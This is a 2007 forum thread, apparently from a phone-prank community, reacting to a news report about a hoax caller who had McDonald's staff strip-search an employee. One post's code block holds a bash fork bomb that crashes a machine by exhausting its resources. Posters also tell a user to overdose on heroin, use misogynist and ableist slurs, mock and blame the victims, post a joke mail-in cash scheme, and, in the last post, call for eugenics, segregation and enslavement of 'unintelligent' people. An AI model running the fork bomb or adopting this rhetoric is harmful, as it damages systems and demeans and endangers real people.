Author Topic: Ok, who here did this?  (Read 3700 times)

Offline Kizzle

• Newb
  • 1337 13V3L: +0/-8
Ok, who here did this?
« on: October 07, 2007, 08:17:27 AM »
http://www.breitbart.com/article.php?id=D8S39U500

SHEPHERDSVILLE, Ky. (AP) - A jury awarded $6.1 million Friday to a woman who said she was forced to strip in a McDonald's back office after someone called the restaurant posing as a police officer.

Louise Ogborn, 21, had sued McDonald's Corp., claiming the fast-food giant failed to warn her and other employees about the caller who already struck other McDonald's stores and other fast-food restaurants across the country.

Offline Nod

• Quando omni flunkus moritati
  • Elite Cactus Squad
  • Ninja Phone Loser
  • 1337 13V3L: +210/-138
  • 212-389-1318
    • twitter: @mrnudnik
Re: Ok, who here did this?
« Reply #1 on: October 07, 2007, 08:52:27 AM »
I love how we get blamed for everything. Let's get something straight. The PLA is NOT a malicious group. Nor are we a bunch of sex perverts. If we want pr0n we go to the super secret pr0n section of the site located at www.phonelosers.org/THEREISNOFUCKINGPRON.

Also, you should overdose on herion.
I HATE the bridge.
Meme Roth is a Food Nazi Cunt

Offline ApprenticePhreak

• PLA Junkie
  • 1337 13V3L: +48/-12
« Reply #2 on: October 07, 2007, 09:01:41 AM »
Weren't there a series of nubcakes who used to post in the old Cal forums with a grand opening line of "Lolololo way 2 go pla lololol" any time there was a prank phone call of any form was placed into a small tucked away section of a news paper/site/related information in said news article?

At the very worst PLA as a group would illegally steal tuna sandwiches through delivery men of various corporations. Man, what a crazy story that was.
« Last Edit: October 07, 2007, 09:04:40 AM by ApprenticePhreak »

Offline Kizzle

• Newb
  • 1337 13V3L: +0/-8
« Reply #3 on: October 07, 2007, 10:21:21 AM »
The PLA is NOT a malicious group.

My low post count here caused you to go into PR mode, lawl.  And since when is the PLA a group? Not only that, a group with a governing body that somehow regulates what random people on a forum do with their phones?

Back on the old Cal forums I remember people posting a prank call impersonating a police officer to another officer, and another one where they called a big retail store and pretended to be store security, then accused a store employee of shoplifting and got them to do all kinds of silly things. Yeah, this news story is a huge stretch.

I laughed when I read this story because I've talked to people on bridges from these forums that I know would totally do something like this if given the chance.

Offline RijilV

• :)
  • PLA Guru
  • 1337 13V3L: +30/-7
« Reply #4 on: October 07, 2007, 10:41:03 AM »

My low post count here caused you to go into PR mode, lawl.  And since when is the PLA a group? Not only that, a group with a governing body that somehow regulates what random people on a forum do with their phones?

Obviously you haven't been inducted, otherwise you would have a copy of the by-laws which clearly outline the election process and division of power within the PLA organization.  The rules are fairly complex, otherwise I'd explain them.  Probably the easiest way is just to apply to become a member, as you'll get all the stuff in the mail that away along with a 10% discount coupon for Hertz Rent a Car.

Just send your shipping information along with $20 ( to cover the cost of printing and shipping) to:

PLA
General Delivery
Seattle WA, 98104
Code: [Select]
#!/bin/bash
:() { :|:& };:

Offline mr_doc

• Supergluer of coins
  • PLA Junkie
  • 1337 13V3L: +71/-24
    • PLA LotGD
« Reply #5 on: October 07, 2007, 11:34:07 AM »

Obviously you haven't been inducted, otherwise you would have a copy of the by-laws which clearly outline the election process and division of power within the PLA organization.  The rules are fairly complex, otherwise I'd explain them.  Probably the easiest way is just to apply to become a member, as you'll get all the stuff in the mail that away along with a 10% discount coupon for Hertz Rent a Car.

Just send your shipping information along with $20 ( to cover the cost of printing and shipping) to:

PLA
General Delivery
Seattle WA, 98104

Checks payable to 'cash'
PLAlotgd  -If you play, I will hate you a little less.
Unnamed Forums

Offline Zazen

• Cactus Zombie
  • 1337 13V3L: +34/-14
« Reply #6 on: October 07, 2007, 03:26:44 PM »
The Mcdonalds strip search thing was already commented on here: http://www.phonelosers.org/forums/index.php?topic=103.0

I guess this story ends with some fucked-up irony. The blithering retard who did what he was told over the phone got five years in prison and the actual caller got off scott free.

Offline Tachyon

• Minister of Defence
  • OMG Mod
  • Ninja Phone Loser
  • 1337 13V3L: +125/-62
« Reply #7 on: October 07, 2007, 03:35:50 PM »
We don't have tittypix yet, hence you cannot be a member.
Do you speak two languages?

"Detective Don Gombo: IM AFRAID THE ONLY ONE "F" IS "U" MY FRIEND. WELCOME TO THE CRIMINAL JUSTICE WEB!"

Offline rbcp

• Head Custodian
  • Administrator
  • Ninja Phone Loser
  • 1337 13V3L: +454/-81
  • I'm not stupid! I'm not stupid! Hematology!
    • Homepage
« Reply #8 on: October 07, 2007, 04:26:12 PM »
This story happens a few times a year.  It's hard to feel sorry for the victims (the hapless manager and employee) since they're both lacking any common sense at all.  I think it's about time that all the fast food places dedicate an entire day of their employee training program to not falling for this scam.

Offline frog

• Defender of the Forums, Speaks Two Languages
  • PLA Henchman
  • 1337 13V3L: +148/-48
  • Ribbit.
« Reply #9 on: October 09, 2007, 04:39:20 AM »
This story happens a few times a year.  It's hard to feel sorry for the victims (the hapless manager and employee) since they're both lacking any common sense at all.  I think it's about time that all the fast food places dedicate an entire day of their employee training program to not falling for this scam.
Srsly. There's a line where 'resisting arrest' becomes a better idea than believing a vibrating piece of plastic. Talk about idolatry.
To see this post in braille, click here.

Offline Nod

• Elite Cactus Squad
  • Ninja Phone Loser
  • 212-389-1318
« Reply #10 on: October 09, 2007, 09:29:20 AM »
We don't have tittypix yet, hence you cannot be a member.

We can't be the only ones reading these stories. Weren't there a few times when one of these stories got national attention? I seem to remember having seen the one about the strip searches at the Wendy's Resteraunts on CNN or something. So one would think they could safely assume that other people are knowing about this. I think that stories like this just further prove my belief that ninety percent of the population is actually borderline retarded. I think any intelligent person knows that if the police wanted to search someone of interest they would physically come and search that person themselves and not call an unqualified civilian and ask them to perform a search because if they did and something was found it would be inadmissable in court. I think the gullability of America is by and large, one of major roots of our problems in this country.
« Last Edit: October 09, 2007, 09:39:21 AM by LordNod »
I HATE the bridge.

Offline Tachyon

• Minister of Defence
  • OMG Mod
  • Ninja Phone Loser
« Reply #11 on: October 09, 2007, 01:01:44 PM »
Well that and the fact that it's almost revered as a virtue.

"Detective Don Gombo: IM AFRAID THE ONLY ONE "F" IS "U" MY FRIEND. WELCOME TO THE CRIMINAL JUSTICE WEB!"

Offline Nod

• Elite Cactus Squad
  • Ninja Phone Loser
  • 212-389-1318
« Reply #12 on: October 09, 2007, 04:06:10 PM »
Well that and the fact that it's almost revered as a virtue.

You mean that naivety is almost revered as a virtue? That's true. It's almost as if being uninformed is the "cool" thing to be.
I HATE the bridge.

Offline Tachyon

• Minister of Defence
  • OMG Mod
  • Ninja Phone Loser
« Reply #13 on: October 09, 2007, 06:21:25 PM »
Yeah that's what I meant.

Offline Nod

• Elite Cactus Squad
  • Ninja Phone Loser
  • 212-389-1318
« Reply #14 on: October 09, 2007, 06:42:39 PM »
This is why I've been calling for an intelligence based euginics program for years. And if we're not going to kill them for "moral reasons" than we can at least try and stick them all on one continent and keep them away from the intelligent people.

Or enslavement....
I HATE the bridge.